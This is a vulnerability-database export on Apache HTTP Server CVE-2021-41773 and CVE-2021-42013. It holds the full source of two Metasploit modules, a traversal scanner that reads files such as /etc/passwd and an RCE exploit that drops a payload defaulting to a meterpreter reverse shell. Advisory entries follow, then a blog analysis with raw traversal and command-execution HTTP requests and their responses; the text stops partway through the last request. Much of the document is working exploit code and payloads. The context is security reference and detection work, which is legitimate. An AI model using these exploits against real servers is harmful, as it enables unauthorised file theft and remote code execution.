{"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-06T17:00:59", "type": "metasploit", "title": "Apache 2.4.49/2.4.50 Traversal RCE scanner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-22T16:38:03", "id": "MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH-", "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/http/apache_normalize_path/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache 2.4.49/2.4.50 Traversal RCE scanner',\n 'Description' => %q{\n This module scans for an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773).\n If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled,\n it can be used to execute arbitrary commands (Remote Command Execution).\n This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).\n },\n 'References' => [\n ['CVE', '2021-41773'],\n ['CVE', '2021-42013'],\n ['URL', 'https://httpd.apache.org/security/vulnerabilities_24.html'],\n ['URL', 'https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/apache/apache-httpd-rce.yaml'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/commit/9384dd235ec5107f423d930ac80055f2ce2bff74'],\n ['URL', 'https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis']\n ],\n 'Author' => [\n 'Ash Daulton', # Vulnerability discovery\n 'Dhiraj Mishra', # Metasploit auxiliary module\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Metasploit exploit module (Zeop Entreprise)\n ],\n 'DisclosureDate' => '2021-05-10',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n },\n 'Actions' => [\n [\n 'CHECK_TRAVERSAL',\n {\n 'Description' => 'Check for vulnerability.'\n }\n ],\n [\n 'CHECK_RCE',\n {\n 'Description' => 'Check for RCE (if mod_cgi is enabled).'\n }\n ],\n [\n 'READ_FILE',\n {\n 'Description' => 'Read file on the remote server.'\n }\n ]\n ],\n 'DefaultAction' => 'CHECK_TRAVERSAL'\n )\n )\n\n register_options([\n OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2021-42013', ['CVE-2021-41773', 'CVE-2021-42013']]),\n OptInt.new('DEPTH', [true, 'Depth for Path Traversal', 5]),\n OptString.new('FILEPATH', [false, 'File you want to read', '/etc/passwd']),\n OptString.new('TARGETURI', [true, 'Base path', '/cgi-bin'])\n ])\n end\n\n def exec_traversal(cmd)\n send_request_raw({\n 'method' => Rex::Text.rand_text_alpha(3..4),\n 'uri' => normalize_uri(datastore['TARGETURI'], @traversal.to_s),\n 'data' => \"#{Rex::Text.rand_text_alpha(1..3)}=|echo;#{cmd}\"\n })\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def pick_payload\n case datastore['CVE']\n when 'CVE-2021-41773'\n payload = '.%2e/'\n when 'CVE-2021-42013'\n payload = '.%%32%65/'\n else\n payload = ''\n end\n\n payload\n end\n\n def read_traversal\n send_request_raw({\n 'method' => 'GET',\n 'uri' => normalize_uri(@target_uri, @traversal.to_s)\n })\n end\n\n def run_host(ip)\n @proto = (ssl ? 'https' : 'http')\n\n case action.name\n when 'CHECK_TRAVERSAL'\n @target_uri = datastore['TARGETURI']\n @traversal = pick_payload * datastore['DEPTH'] << '/etc/passwd'\n\n response = read_traversal\n unless response\n print_error(message('No response, target seems down.'))\n\n return Exploit::CheckCode::Unknown\n end\n\n if response.code == 200 && response.body.include?('root:x:0:0:')\n print_good(message(\"The target is vulnerable to #{datastore['CVE']}.\"))\n\n vprint_status(\"Obtained HTTP response code #{response.code}.\")\n report_vuln(\n host: target_host,\n name: name,\n refs: references\n )\n\n return Exploit::CheckCode::Vulnerable\n end\n print_error(message(\"The target is not vulnerable to #{datastore['CVE']}.\"))\n\n return Exploit::CheckCode::Safe\n when 'CHECK_RCE'\n @traversal = pick_payload * datastore['DEPTH'] << '/bin/sh'\n rand_str = Rex::Text.rand_text_alpha(4..8)\n\n response = exec_traversal(\"echo #{rand_str}\")\n unless response\n print_error(message('No response, target seems down.'))\n\n return Exploit::CheckCode::Unknown\n end\n\n if response.code == 200 && response.body.include?(rand_str)\n print_good(message(\"The target is vulnerable to #{datastore['CVE']} (mod_cgi is enabled).\"))\n report_vuln(\n host: target_host,\n name: name,\n refs: references\n )\n\n return Exploit::CheckCode::Vulnerable\n end\n print_error(message(\"The target is not vulnerable to #{datastore['CVE']} (requires mod_cgi to be enabled).\"))\n\n return Exploit::CheckCode::Safe\n when 'READ_FILE'\n fail_with(Failure::BadConfig, 'File path option is empty!') if !datastore['FILEPATH'] || datastore['FILEPATH'].empty?\n\n @target_uri = datastore['TARGETURI']\n @traversal = pick_payload * datastore['DEPTH'] << datastore['FILEPATH']\n\n response = read_traversal\n unless response\n print_error(message('No response, target seems down.'))\n\n return Exploit::CheckCode::Unknown\n end\n\n vprint_status(\"Obtained HTTP response code #{response.code}.\")\n if response.code == 500\n print_warning(message(\"The target is vulnerable to #{datastore['CVE']} (mod_cgi is enabled).\"))\n report_vuln(\n host: target_host,\n name: name,\n refs: references\n )\n end\n\n if response.code == 500 || response.body.empty?\n print_error('Nothing was downloaded')\n\n return Exploit::CheckCode::Vulnerable if response.code == 500\n end\n\n if response.code == 200\n vprint_good(\"#{peer} \\n#{response.body}\")\n path = store_loot(\n 'apache.traversal',\n 'application/octet-stream',\n ip,\n response.body,\n datastore['FILEPATH']\n )\n print_good(\"File saved in: #{path}\")\n\n report_vuln(\n host: target_host,\n name: name,\n refs: references\n )\n\n return Exploit::CheckCode::Vulnerable\n end\n\n return Exploit::CheckCode::Safe\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/apache_normalize_path.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-17T10:41:58", "description": "This module exploit an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773). If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled, it can be used to execute arbitrary commands (Remote Command Execution). This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T11:22:47", "type": "metasploit", "title": "Apache 2.4.49/2.4.50 Traversal RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-10T13:01:15", "id": "MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/apache_normalize_path_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache 2.4.49/2.4.50 Traversal RCE',\n 'Description' => %q{\n This module exploit an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773).\n If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled,\n it can be used to execute arbitrary commands (Remote Command Execution).\n This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).\n },\n 'References' => [\n ['CVE', '2021-41773'],\n ['CVE', '2021-42013'],\n ['URL', 'https://httpd.apache.org/security/vulnerabilities_24.html'],\n ['URL', 'https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/apache/apache-httpd-rce.yaml'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/commit/9384dd235ec5107f423d930ac80055f2ce2bff74'],\n ['URL', 'https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis']\n ],\n 'Author' => [\n 'Ash Daulton', # Vulnerability discovery\n 'Dhiraj Mishra', # Metasploit auxiliary module\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Metasploit exploit module (Zeop Entreprise)\n ],\n 'DisclosureDate' => '2021-05-10',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/scanner/http/apache_normalize_path',\n 'Action' => 'CHECK_RCE',\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Targets' => [\n [\n 'Automatic (Dropper)',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',\n 'DisablePayloadHandler' => 'false'\n }\n }\n ],\n [\n 'Unix Command (In-Memory)',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/generic',\n 'DisablePayloadHandler' => 'true'\n }\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2021-42013', ['CVE-2021-41773', 'CVE-2021-42013']]),\n OptInt.new('DEPTH', [true, 'Depth for Path Traversal', 5]),\n OptString.new('TARGETURI', [true, 'Base path', '/cgi-bin'])\n ])\n end\n\n def cmd_unix_generic?\n datastore['PAYLOAD'] == 'cmd/unix/generic'\n end\n\n def execute_command(command, _opts = {})\n traversal = pick_payload * datastore['DEPTH'] << '/bin/sh'\n\n uri = normalize_uri(datastore['TARGETURI'], traversal.to_s)\n response = send_request_raw({\n 'method' => Rex::Text.rand_text_alpha(3..4),\n 'uri' => uri,\n 'data' => \"#{Rex::Text.rand_text_alpha(1..3)}=|echo;#{command}\"\n })\n if response && response.body\n return response.body\n end\n\n false\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def pick_payload\n case datastore['CVE']\n when 'CVE-2021-41773'\n payload = '.%2e/'\n when 'CVE-2021-42013'\n payload = '.%%32%65/'\n else\n payload = ''\n end\n\n payload\n end\n\n def exploit\n @proto = (ssl ? 'https' : 'http')\n\n if (!check.eql? Exploit::CheckCode::Vulnerable) && !datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'The target is not exploitable.')\n end\n\n print_status(message(\"Attempt to exploit for #{datastore['CVE']}\"))\n case target['Type']\n when :linux_dropper\n\n file_name = \"/tmp/#{Rex::Text.rand_text_alpha(4..8)}\"\n cmd = \"echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}\"\n\n print_status(message(\"Sending #{datastore['PAYLOAD']} command payload\"))\n vprint_status(message(\"Generated command payload: #{cmd}\"))\n\n execute_command(cmd)\n\n register_file_for_cleanup file_name\n when :unix_command\n vprint_status(message(\"Generated payload: #{payload.encoded}\"))\n\n if !cmd_unix_generic?\n execute_command(payload.encoded)\n else\n received = execute_command(payload.encoded.to_s)\n\n print_warning(message('Dumping command output in response'))\n if !received\n print_error(message('Empty response, no command output'))\n\n return\n end\n print_line(received)\n end\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/apache_normalize_path_rce.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2023-02-08T16:46:19", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration &quot;require all denied&quot;, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013. ([CVE-2021-41773](<https://vulners.com/cve/CVE-2021-41773>)) \n \nIt was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration &quot;require all denied&quot;, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions. ([CVE-2021-42013](<https://vulners.com/cve/CVE-2021-42013>))\n\nImpact\n\nThere is no impact; F5 products are not affected by this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-21T11:53:00", "type": "f5", "title": "Apache HTTP Server vulnerability CVE-2021-41773, CVE-2021-42013", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-21T11:53:00", "id": "F5:K04082144", "href": "https://support.f5.com/csp/article/K04082144", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2023-03-19T02:05:50", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T09:15:00", "type": "debiancve", "title": "CVE-2021-41773", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-05T09:15:00", "id": "DEBIANCVE:CVE-2021-41773", "href": "https://security-tracker.debian.org/tracker/CVE-2021-41773", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-03-19T02:05:50", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T16:15:00", "type": "debiancve", "title": "CVE-2021-42013", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T16:15:00", "id": "DEBIANCVE:CVE-2021-42013", "href": "https://security-tracker.debian.org/tracker/CVE-2021-42013", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2021-11-26T18:36:54", "description": "On October 4, 2021, Apache HTTP Server Project released Security advisory on a Path traversal and File disclosure vulnerability in Apache HTTP Server 2.4.49 and 2.4.50 tracked as CVE-2021-41773 and CVE-2021-42013. In the advisory, Apache also highlighted \u201cthe issue is known to be exploited in the wild\u201d and later it was identified that the vulnerability can be abused to perform remote code execution. For exploiting both the vulnerabilities Apache HTTP server must be running in non-default configuration.\n\nAs the vulnerabilities are configuration dependent, checking the version of Apache web server is not enough to identify vulnerable servers. With both the CVEs being actively exploited, [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) has released **QID 150372, 150373, 150374** which sends specially crafted HTTP request to the target server to determine if it is exploitable. Once successfully detected, users can remediate the vulnerabilities by upgrading to Apache HTTP Sever 2.4.51 or greater.\n\n### About CVE-2021-41773\n\nAccording to **CVE-2021-41773**, Apache HTTP Server 2.4.49 is vulnerable to Path Traversal and Remote Code execution attacks.\n\n#### Path Traversal Analysis\n\nThe path traversal vulnerability was introduced due to the new code change added for path normalization i.e., for URL paths to remove unwanted or dangerous parts from the pathname, but it was inadequate to detect different techniques of encoding the path traversal characters &quot;dot-dot-slash (../)&quot;\n\nTo prevent path traversal attacks, the normalization function which is responsible to resolve URL-encoded values from the requested URI, resolved Unicode values one at a time. Hence when URL encoding the second dot as `%2e`, the logic fails to recognize `%2e` as dot thereby not decoding it, this converts the characters `../` to `.%2e/` and bypasses the check.\n\nAlong with Path traversal check bypass, for an Apache HTTP server to be vulnerable, the HTTP Server configuration should either contain the [directory directive](<https://httpd.apache.org/docs/2.4/mod/core.html#directory>) for entire server\u2019s filesystem as `Require all granted` or the directory directive should be completely missing from the configuration file.\n\n##### Vulnerable Configuration:\n \n \n <Directory />\n Require all granted\n </Directory>\n \n\nTherefore, bypassing the dot-dot check as `.%2e` and chaining it with misconfigured directory directive allows an attacker to read arbitrary files such as `passwd` from the vulnerable server file system.\n\n##### Exploitation: Path Traversal\n\nRequest:\n \n \n GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1\n Host: 127.0.0.1:8080\n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n\nResponse:\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 08:13:02 GMT\n Server: Apache/2.4.49 (Unix)\n Last-Modified: Mon, 27 Sep 2021 00:00:00 GMT\n ETag: \"39e-5cceec7356000\"\n Accept-Ranges: bytes\n Content-Length: 926\n Connection: close\n \n root:x:0:0:root:/root:/bin/bash\n daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n bin:x:2:2:bin:/bin:/usr/sbin/nologin\n sys:x:3:3:sys:/dev:/usr/sbin/nologin\n sync:x:4:65534:sync:/bin:/bin/sync\n games:x:5:60:games:/usr/games:/usr/sbin/nologin\n man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n news:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\n proxy:x:13:13:proxy:/bin:/usr/sbin/nologin\n www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n backup:x:34:34:backup:/var/backups:/usr/sbin/nologin\n list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\n irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\n gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\n nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n _apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n\nPlease note that the default configuration of Apache HTTP server has the entire filesystem directory directive configured as `Require all denied` and hence is not vulnerable.\n\n#### Remote Code Execution Analysis\n\nWhile **CVE-2021-41773** was initially documented as Path traversal and File disclosure vulnerability additional research concluded that the vulnerability can be further exploited to conduct remote code execution when [mod_cgi](<https://httpd.apache.org/docs/current/mod/mod_cgi.html>) module is enabled on the Apache HTTP server, this allows an attacker to leverage the path traversal vulnerability and call any binary on the system using HTTP POST requests.\n\n##### Configuration to enable mod_cgi module:\n \n \n <IfModule !mpm_prefork_module>\n LoadModule cgid_module modules/mod_cgid.so\n </IfModule>\n \n\nBy default the `mod_cgi` module is disabled on Apache HTTP server by commenting the above line in the configuration file. Hence, when mod_cgi is enabled and \u201cRequire all granted\u201d config is applied to the filesystem directory directive then an attacker can remotely execute commands on the Apache server. \n\n##### Exploitation: Remote Code Execution\n\nRequest:\n \n \n POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1\n Host: 127.0.0.1:8080\n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0\n Accept: */*\n Content-Length: 7\n Content-Type: application/x-www-form-urlencoded\n Connection: close\n \n echo;id\n\nResponse:\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 09:58:23 GMT\n Server: Apache/2.4.49 (Unix)\n Connection: close\n Content-Length: 45\n \n uid=1(daemon) gid=1(daemon) groups=1(daemon)\n\nLooking at the HTTP POST request for RCE, we can understand `/bin/sh` is the system binary that executes the payload `echo;id` and print the output of `id` command in response.\n\n### About CVE-2021-42013\n\n**CVE-2021-42013** was introduced as the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient as it did not cover double URL encoding, therefore the vulnerable configurations remained the same, but payload used in 2.4.49 was double URL encoded in 2.4.50 to administer the same path traversal and remote code execution attack.\n\nThe attack in 2.4.49 initially encoded the second dot (.) to `%2e` and the same was double URL encoded into `%%32%65` for version 2.4.50\n\n##### **Encoding Analysis**\n\nConversion: dot \u2192 `%2e` \u2192 `%%32%65`\n\n * 2 is encoded to %32\n * e is encoded to %65\n * And original `%` left as it is\n\nThus a `dot` is equivalent to `%%32%65` which eventually converts `../` in double URL encode format as `%%32%65%%32%65/`\n\n##### Exploitation: Path Traversal\n\nRequest:\n \n \n GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1\n Host: 127.0.0.1:8080\n User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n\nResponse:\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 10:16:51 GMT\n Server: Apache/2.4.50 (Unix)\n Last-Modified: Mon, 27 Sep 2021 00:00:00 GMT\n ETag: \"39e-5cceec7356000\"\n Accept-Ranges: bytes\n Content-Length: 926\n Connection: close\n \n \n root:x:0:0:root:/root:/bin/bash\n daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n bin:x:2:2:bin:/bin:/usr/sbin/nologin\n sys:x:3:3:sys:/dev:/usr/sbin/nologin\n sync:x:4:65534:sync:/bin:/bin/sync\n games:x:5:60:games:/usr/games:/usr/sbin/nologin\n man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n news:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\n proxy:x:13:13:proxy:/bin:/usr/sbin/nologin\n www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n backup:x:34:34:backup:/var/backups:/usr/sbin/nologin\n list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\n irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\n gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\n nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n _apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n\n##### Exploitation: Remote Code Execution\n\nRequest:\n \n \n POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1\n Host: 127.0.0.1:8080\n User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n 